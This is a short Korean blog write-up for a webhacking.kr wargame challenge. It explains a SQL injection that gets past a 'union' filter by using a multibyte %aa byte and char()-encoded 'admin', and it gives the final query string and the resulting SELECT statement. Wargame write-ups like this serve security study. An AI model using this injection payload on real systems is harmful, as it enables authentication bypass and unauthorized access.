Summary
|
▼ Challenge 50은 다음과 같습니다.
▼ PHP 코드는 다음과 같습니다.
자세한 설명은 Challenge 50(http://limjunyoung.tistory.com/101)을 참고하시기 바랍니다.
$_GET[id]와 $_GET[pw] 모두 "union" 문자열을 필터링하고 있기 때문에, $_GET[id] 파라미터에서 "admin"을 출력하도록 만들겠습니다.
최종 Query String과 실제 SELECT 구문은 다음과 같습니다.
?id=%aa%27%20or%20id=char(97,100,109,105,110)%23&pw=guest | cs |
SELECT id FROM member WHERE id='%aa' or id=char(97,100,109,105,110)#' and pw=md5('guest'); | cs |
'WarGame > webhacking.kr' 카테고리의 다른 글
[webhacking.kr] Challenge 44 :: Command Injection 2 (0) | 2015.12.18 |
---|---|
[webhacking.kr] Challenge 40 :: Blind SQL Injection 3 (0) | 2015.12.18 |
[webhacking.kr] Challenge 50 :: SQL Injection ( mb_convert_encoding ) (0) | 2015.12.16 |
[webhacking.kr] Challenge 34 :: JavaScript Obfuscation (0) | 2015.12.16 |
[webhacking.kr] Challenge 55 :: Blind SQL Injection 2 (0) | 2015.12.11 |